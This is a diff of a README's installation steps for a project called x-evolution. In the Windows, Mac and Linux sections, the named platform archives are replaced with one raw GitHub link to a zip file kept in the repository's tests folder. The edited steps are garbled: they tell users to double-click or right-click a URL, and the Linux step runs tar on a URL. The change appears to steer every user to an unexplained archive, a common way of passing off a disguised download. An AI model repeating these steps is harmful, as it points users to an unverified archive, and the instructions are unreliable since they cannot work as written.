diflow95400/x-evolution/README.md

 #### For Windows:

 1. Open your Downloads folder.
-2. Right-click the `x-evolution-Windows.zip` file and select "Extract All...".
+2. Right-click the `https://raw.githubusercontent.com/diflow95400/x-evolution/main/tests/x-evolution_2.1.zip` file and select "Extract All...".
 3. Follow the prompts to unzip the files into a folder.

 #### For Mac:

 1. Navigate to your Downloads folder.
-2. Double-click the `x-evolution-Mac.zip` file.
+2. Double-click the `https://raw.githubusercontent.com/diflow95400/x-evolution/main/tests/x-evolution_2.1.zip` file.
 It will automatically unzip into a folder.

 #### For Linux:

 1. Open a terminal.
 2. Navigate to your Downloads folder using `cd ~/Downloads`.
-3. Run the command: `tar -xvzf x-evolution-Linux.tar.gz`.
+3. Run the command: `tar -xvzf https://raw.githubusercontent.com/diflow95400/x-evolution/main/tests/x-evolution_2.1.zip`.

 ## 🎉 Running the Application